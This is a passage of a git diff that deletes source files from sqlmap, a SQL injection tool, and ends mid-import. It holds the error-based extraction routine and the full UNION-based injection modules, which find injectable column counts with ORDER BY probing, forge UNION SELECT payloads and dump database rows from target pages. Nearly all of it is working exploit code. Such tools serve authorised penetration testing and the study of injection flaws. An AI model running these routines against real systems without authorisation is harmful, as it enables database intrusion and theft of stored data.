values.append(output) - - return values - -def _errorReplaceChars(value): - """ - Restores safely replaced characters - """ - - retVal = value - - if value: - retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") - - return retVal - -def _formatPartialContent(value): - """ - Prepares (possibly hex-encoded) partial content for safe console output - """ - - if value and isinstance(value, basestring): - try: - value = hexdecode(value) - except: - pass - 
finally: - value = safecharencode(value) - - return value - -def errorUse(expression, dump=False): - """ - Retrieve the output of a SQL query taking advantage of the error-based - SQL injection vulnerability on the affected parameter. - """ - - initTechnique(kb.technique) - - abortedFlag = False - count = None - emptyFields = [] - start = time.time() - startLimit = 0 - stopLimit = None - value = None - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - - # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None - - # We have to check if the SQL query might return multiple entries - # and in such case forge the SQL limiting the query output one - # entry at a time - # NOTE: we assume that only queries that get data from a table can - # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) - - if limitCond: - # Count the number of SQL query entries output - countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) - count = unArrayizeValue(_oneShotErrorUse(countedExpression, 
countedExpressionFields)) - - if isNumPosStrValue(count): - if isinstance(stopLimit, int) and stopLimit > 0: - stopLimit = min(int(count), int(stopLimit)) - else: - stopLimit = int(count) - - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) - - elif count and not count.isdigit(): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. " - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - else: - value = [] # for empty tables - return value - - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") - - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] - - numThreads = min(conf.threads, (stopLimit - startLimit)) - - threadData = getCurrentThreadData() - - try: - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. 
Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. 
It might take too long" - logger.debug(debugMsg) - - try: - def errorThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: - break - - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) - - if not kb.threadContinue: - break - - if output and isListLike(output) and len(output) == 1: - output = output[0] - - with kb.locks.value: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] - - runThreads(numThreads, errorThread) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. 
sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = False - - if not value and not abortedFlag: - value = _errorFields(expression, expressionFields, expressionFieldsList) - - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = value[0] - - duration = calculateDeltaSeconds(start) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[kb.technique], duration) - logger.debug(debugMsg) - - return value diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/union/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py deleted file mode 100644 index 2374d2d2..00000000 --- a/lib/techniques/union/test.py +++ /dev/null @@ -1,320 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.agent import agent -from lib.core.common import average -from lib.core.common import Backend -from lib.core.common import isNullValue -from lib.core.common import listToStrValue -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import stdev -from lib.core.common import 
wasLastResponseDBMSError -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import PAYLOAD -from lib.core.settings import LIMITED_ROWS_TEST_NUMBER -from lib.core.settings import UNION_MIN_RESPONSE_CHARS -from lib.core.settings import UNION_STDEV_COEFF -from lib.core.settings import MIN_RATIO -from lib.core.settings import MAX_RATIO -from lib.core.settings import MIN_STATISTICAL_RANGE -from lib.core.settings import MIN_UNION_RESPONSES -from lib.core.settings import NULL -from lib.core.settings import ORDER_BY_STEP -from lib.core.unescaper import unescaper -from lib.request.comparison import comparison -from lib.request.connect import Connect as Request - -def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): - """ - Finds number of columns affected by UNION based injection - """ - retVal = None - - def _orderByTechnique(): - def _orderByTest(cols): - query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) - query = agent.suffixQuery(query, suffix=suffix, comment=comment) - payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) - - if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " - infoMsg += "This should reduce the time needed " - infoMsg += "to find the right number " - infoMsg += "of query columns. 
Automatically extending the " - infoMsg += "range for current UNION query injection technique test" - singleTimeLogMessage(infoMsg) - - lowCols, highCols = 1, ORDER_BY_STEP - found = None - while not found: - if _orderByTest(highCols): - lowCols = highCols - highCols += ORDER_BY_STEP - else: - while not found: - mid = highCols - (highCols - lowCols) / 2 - if _orderByTest(mid): - lowCols = mid - else: - highCols = mid - if (highCols - lowCols) < 2: - found = lowCols - - return found - - try: - pushValue(kb.errorIsNone) - items, ratios = [], [] - kb.errorIsNone = False - lowerCount, upperCount = conf.uColsStart, conf.uColsStop - - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() - if found: - kb.orderByColumns = found - infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") - singleTimeLogMessage(infoMsg) - return found - - if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: - upperCount = lowerCount + MIN_UNION_RESPONSES - - min_, max_ = MAX_RATIO, MIN_RATIO - pages = {} - - for count in xrange(lowerCount, upperCount + 1): - query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - if not isNullValue(kb.uChar): - pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO - ratios.append(ratio) - min_, max_ = min(min_, ratio), max(max_, ratio) - items.append((count, ratio)) - - if not isNullValue(kb.uChar): - for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] - break - - if not retVal: - if min_ in ratios: - ratios.pop(ratios.index(min_)) - if max_ in ratios: - 
ratios.pop(ratios.index(max_)) - - minItem, maxItem = None, None - - for item in items: - if item[1] == min_: - minItem = item - elif item[1] == max_: - maxItem = item - - if all(map(lambda x: x == min_ and x != max_, ratios)): - retVal = maxItem[0] - - elif all(map(lambda x: x != min_ and x == max_, ratios)): - retVal = minItem[0] - - elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: - deviation = stdev(ratios) - lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - - if min_ < lower: - retVal = minItem[0] - - if max_ > upper: - if retVal is None or abs(max_ - upper) > abs(min_ - lower): - retVal = maxItem[0] - finally: - kb.errorIsNone = popValue() - - if retVal: - infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) - - return retVal - -def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): - validPayload = None - vector = None - - positions = range(0, count) - - # Unbiased approach for searching appropriate usable column - random.shuffle(positions) - - for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): - if vector: - break - - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(charCount) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) - - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - 
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(charCount) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform 
the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() - - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break - - return validPayload, vector - -def _unionConfirm(comment, place, parameter, prefix, suffix, count): - validPayload = None - vector = None - - # Confirm the union SQL injection and get the exact column - # position which can be used to extract data - validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count) - - # Assure that the above function found the exploitable full union - # SQL injection position - if not validPayload: - validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) - - return validPayload, vector - -def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): - """ - This method tests if the target URL is affected by an union - SQL injection vulnerability. 
The test is done up to 50 columns - on the target database table - """ - - validPayload = None - vector = None - - # In case that user explicitly stated number of columns affected - if conf.uColsStop == conf.uColsStart: - count = conf.uColsStart - else: - count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) - - if count: - validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - - if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): - warnMsg = "if UNION based SQL injection is not detected, " - warnMsg += "please consider " - - if not conf.uChar and count > 1 and kb.uChar == NULL: - message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): - warnMsg += "usage of option '--union-char' " - warnMsg += "(e.g. '--union-char=1') " - else: - conf.uChar = kb.uChar = str(randomInt(2)) - validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - - if not conf.dbms: - if not conf.uChar: - warnMsg += "and/or try to force the " - else: - warnMsg += "forcing the " - warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " - - if not all([validPayload, vector]) and not warnMsg.endswith("consider "): - singleTimeWarnMessage(warnMsg) - - return validPayload, vector - -def unionTest(comment, place, parameter, value, prefix, suffix): - """ - This method tests if the target URL is affected by an union - SQL injection vulnerability. 
The test is done up to 3*50 times - """ - - if conf.direct: - return - - kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) - - if validPayload: - validPayload = agent.removePayloadDelimiters(validPayload) - - return validPayload, vector diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py deleted file mode 100644 index 381cd658..00000000 --- a/lib/techniques/union/use.py +++ /dev/null @@ -1,367 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import extractRegexResult -from lib.core.common import flattenValue -from lib.core.common import getConsoleWidth -from lib.core.common import getPartRun -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import initTechnique -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import listToStrValue -from lib.core.common import parseUnionPage -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeDebugMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import wasLastResponseDBMSError -from lib.core.convert import htmlunescape -from lib.core.data import conf -from lib.core.data import 
kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar -from thirdparty.odict.odict import OrderedDict - -def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted - - threadData = getCurrentThreadData() - threadData.resumed = retVal is not None - - if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) - - # Forge the UNION SQL injection request - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - kb.forcePartialUnion = vector[8] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] - payload = agent.payload(newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) - - incrementCounter(PAYLOAD.TECHNIQUE.UNION) - - # Parse the returned page to get the exact UNION-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | 
re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) - - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) - - retVal = _("(?P%s.*%s)" % (kb.chars.start, kb.chars.stop)) - - if retVal is not None: - retVal = getUnicode(retVal, kb.pageEncoding) - - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection - if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): - retVal = htmlunescape(retVal).replace("
    ", "\n") - - hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) - else: - trimmed = _("%s(?P.*?)<" % (kb.chars.start)) - - if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(probably due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - else: - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - - return retVal - -def configUnion(char=None, columns=None): - def _configUnionChar(char): - if not isinstance(char, basestring): - return - - kb.uChar = char - - if conf.uChar is not None: - kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) - - def _configUnionCols(columns): - if not isinstance(columns, basestring): - return - - columns = columns.replace(" ", "") - if "-" in columns: - colsStart, colsStop = columns.split("-") - else: - colsStart, colsStop = columns, columns - - if not colsStart.isdigit() or not colsStop.isdigit(): - raise SqlmapSyntaxException("--union-cols must be a range of integers") - - conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) - - if conf.uColsStart > conf.uColsStop: - errMsg = "--union-cols range has to be from lower to " - errMsg += "higher number of columns" - raise SqlmapSyntaxException(errMsg) - - _configUnionChar(char) - _configUnionCols(conf.uCols or columns) - -def unionUse(expression, unpack=True, dump=False): - """ - This function tests for an UNION SQL injection on the target - URL then call its subsidiary function to effectively perform an - UNION SQL injection on the affected URL - """ - - initTechnique(PAYLOAD.TECHNIQUE.UNION) - - abortedFlag = False - count = None - origExpr = expression - startLimit = 0 - stopLimit = None - value = None - - width = getConsoleWidth() - start = time.time() - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) - - # Set kb.partRun in case the engine is 
called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None - - if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): - # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) - debugMsg = "stripping ORDER BY clause from statement because " - debugMsg += "it does not play well with UNION query SQL injection" - singleTimeDebugMessage(debugMsg) - - # We have to check if the SQL query might return multiple entries - # if the technique is partial UNION query and in such case forge the - # SQL limiting the query output one entry at a time - # NOTE: we assume that only queries that get data from a table can - # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - kb.forcePartialUnion or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) - - if limitCond: - # Count the number of SQL query entries output - countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - output = _oneShotUnionUse(countedExpression, unpack) - count = unArrayizeValue(parseUnionPage(output)) - - if isNumPosStrValue(count): - if isinstance(stopLimit, int) and stopLimit > 0: - stopLimit = min(int(count), 
int(stopLimit)) - else: - stopLimit = int(count) - - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) - - elif count and (not isinstance(count, basestring) or not count.isdigit()): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. " - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - else: - value = [] # for empty tables - return value - - threadData = getCurrentThreadData() - - try: - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. 
It might take too long" - logger.debug(debugMsg) - - try: - def unionThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: - break - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None - - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) - - if not kb.threadContinue: - break - - if output: - with kb.locks.value: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) - - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - if isListLike(items): - # in case that we requested N columns and we get M!=N then we have to filter a bit - if len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - items = [_ for _ in flattenValue(items)] - if len(items) > len(expressionFieldsList): - filtered = OrderedDict() - for item in items: - key = re.sub(r"[^A-Za-z0-9]", "", item).lower() - if key not in filtered or re.search(r"[^A-Za-z0-9]", item): - filtered[key] = item - items = filtered.values() - items = [items] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - else: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, 
None)) - - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - - while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): - threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] - if not isNoneValue(_): - threadData.shared.value.extend(arrayizeValue(_)) - del threadData.shared.buffered[0] - - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) - - if len(status) > width: - status = "%s..." % status[:width - 3] - - dataToStdout("%s\n" % status, True) - - runThreads(numThreads, unionThread) - - if conf.verbose == 1: - clearConsoleLine(True) - - except KeyboardInterrupt: - abortedFlag = True - - warnMsg = "user aborted during enumeration. 
sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False - - if not value and not abortedFlag: - output = _oneShotUnionUse(expression, unpack) - value = parseUnionPage(output) - - duration = calculateDeltaSeconds(start) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) - logger.debug(debugMsg) - - return value diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/utils/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/utils/api.py b/lib/utils/api.py deleted file mode 100644 index 6ccfbada..00000000 --- a/lib/utils/api.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import os -import re -import shlex -import socket -import sqlite3 -import sys -import tempfile -import time -import urllib2 - -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle -from lib.core.convert import hexencode -from lib.core.convert import dejsonize -from lib.core.convert import jsonize -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import paths -from lib.core.data import logger -from lib.core.datatype import AttribDict -from lib.core.defaults import _defaults -from lib.core.enums import CONTENT_STATUS -from lib.core.enums import 
